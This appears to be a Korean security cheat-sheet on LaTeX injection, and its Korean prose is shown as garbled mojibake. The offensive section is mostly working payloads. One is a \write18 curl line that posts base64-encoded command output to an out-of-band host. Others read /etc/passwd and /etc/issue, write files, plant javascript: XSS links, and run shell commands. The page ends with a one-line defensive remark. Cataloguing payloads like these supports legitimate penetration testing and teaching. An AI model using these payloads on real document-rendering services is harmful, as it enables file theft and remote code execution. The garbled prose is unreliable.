LaTex Injection

๐Ÿ” Introduction

LaTex๋Š” TeX ๋ฌธ๋ฒ•์„ ์‚ฌ์šฉํ•˜๋Š” typesetting system ์œผ๋กœ ์ด๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ์‹œ์Šคํ…œ์—์„œ TeX ๋ฌธ๋ฒ•์„ ์ฃผ์ž…ํ•˜์—ฌ ๊ณต๊ฒฉ์ž๊ฐ€ ์›ํ•˜๋Š” ์•ก์…˜์„ ์ฒ˜๋ฆฌํ•˜๋„๋ก ์œ ๋„ํ•˜๋Š” ๊ฒƒ์œผ๋กœ LaTex Injection์ด๋ผ๊ณ  ํ•ฉ๋‹ˆ๋‹ค.

TeX๋Š” ์ˆ˜ํ•™์˜ ์ˆ˜์‹ ๋“ฑ ํŠน์ˆ˜ํ•œ ํ˜•ํƒœ๋ฅผ ๋„๋Š” ๊ธ€์ž๋ฅผ ์‰ฝ๊ฒŒ ์ž…๋ ฅํ•˜๊ณ  ์‚ฌ์šฉํ•˜๊ธฐ ์œ„ํ•œ ๋ฌธ๋ฒ•์œผ๋กœ ์ปดํ“จํ„ฐ๋กœ ๋ฌธ์„œ ์ž‘์„ฑ์„ ์œ„ํ•ด ๋งŽ์ด ์‚ฌ์šฉ๋˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์ž์„ธํ•œ ๋‚ด์šฉ์€ wikipedia์˜ TeX ๋ฌธ๋ฒ• ํŽ˜์ด์ง€๋ฅผ ๋ณด๋ฉด ๋Œ€๋žต ์–ด๋–ค ๋‚ด์šฉ์ธ์ง€ ์ดํ•ด๊ฐ€ ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค.

Example

1
\frac{\pi}{2} = \int_{-1}^{1} \sqrt{1-x^2}\ dx

๐Ÿ—ก Offensive techniques

Detect

์ผ๋ฐ˜์ ์œผ๋กœ ํŒŒ์ผ ๋ณ€ํ™˜ ๊ด€๋ จ ๊ธฐ๋Šฅ์— ์กด์žฌํ•  ๊ฐ€๋Šฅ์„ฑ์ด ๋†’์Šต๋‹ˆ๋‹ค. ๋งŒ์•ฝ LaTex๋ฅผ ์ฒ˜๋ฆฌํ•  ์ˆ˜ ์žˆ๋Š” ๋ฐฑ์—”๋“œ ๋กœ์ง์ด ์žˆ๊ฑฐ๋‚˜ ์˜์‹ฌ๊ฐ€๋Š” ๊ฒฝ์šฐ LaTex ๋ฌธ๋ฒ• ์œ„์ฃผ๋กœ Requset์— ํฌํ•จํ•˜์—ฌ ๋ฐ˜์‘์„ ์‚ดํŽด์•ผํ•ฉ๋‹ˆ๋‹ค.

์ด ๋•Œ LaTex Injection ์ค‘ RCE ์ผ€์ด์Šค๋Š” OAST๋ฅผ ์ด์šฉํ•˜๋ฉด ํŒ๋‹จํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

1
\immediate/write18{curl http://<OAST> -X POST -d a=$(id|base64)}

Exploitation

Read file

\input ์ด๋‚˜ \include ๋กœ ํŒŒ์„ ์ฝ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

1
2
\input{/etc/passwd}
\include{/etc/passwd}

Read single lined file

1
2
3
4
5
\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file

Read multiple lined file

1
2
3
4
5
6
7
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
    \read\file to\fileline
    \text{\fileline}
\repeat
\closein\file

usepackage๋กœ ๋‹ค๋ฅธ ํŒจํ‚ค์ง€๋ฅผ ๋กœ๋“œํ•˜๊ณ , ํ•ด๋‹น ๊ธฐ๋Šฅ์„ ํ†ตํ•ด ์ฝ์„ ์ˆ˜๋„ ์žˆ์Šต๋‹ˆ๋‹ค.

1
2
\usepackage{verbatim}
\verbatiminput{/etc/passwd}

Injection ๋œ ๋ถ€๋ถ„์ด document header๋ฅผ ์ง€๋‚œ ๊ฒฝ์šฐ์—๋Š” ์•„๋ž˜์™€ ๊ฐ™์€ ๋ฐฉ๋ฒ•์„ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

1
2
3
4
5
\catcode `\$=12
\catcode `\#=12
\catcode `\_=12
\catcode `\&=12
\input{path_to_script.pl}

Write file

1
2
3
4
5
6
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\write\outfile{Line 2}
\write\outfile{I like trains}
\closeout\outfile

XSS

1
2
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}

Command execution

1
2
\immediate\write18{ifconfig > output}
\input{output}

๐Ÿ›ก Defensive techniques

๊ฐ€๊ธ‰์  ์‚ฌ์šฉ์ž ์ž…๋ ฅ์ด LaTex์— ์˜ํ–ฅ์„ ์ฃผ์ง€ ์•Š๋„๋ก ์„œ๋น„์Šค๋ฅผ ๊ตฌ์„ฑํ•ด์•ผํ•˜๋ฉฐ, ์‚ฌ์šฉ์ž ์ž…๋ ฅ์„ ์‚ฌ์šฉํ•ด์•ผํ•˜๋Š” ๊ฒฝ์šฐ ํŠน์ˆ˜๋ฌธ์ž์— ๋Œ€ํ•œ ๊ฒ€์ฆ์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค.

๐Ÿ•น Tools

  • none

๐Ÿ“Œ References

Licensed under CC BY-NC-SA 4.0
Last updated on Apr 09, 2022 20:40 +0900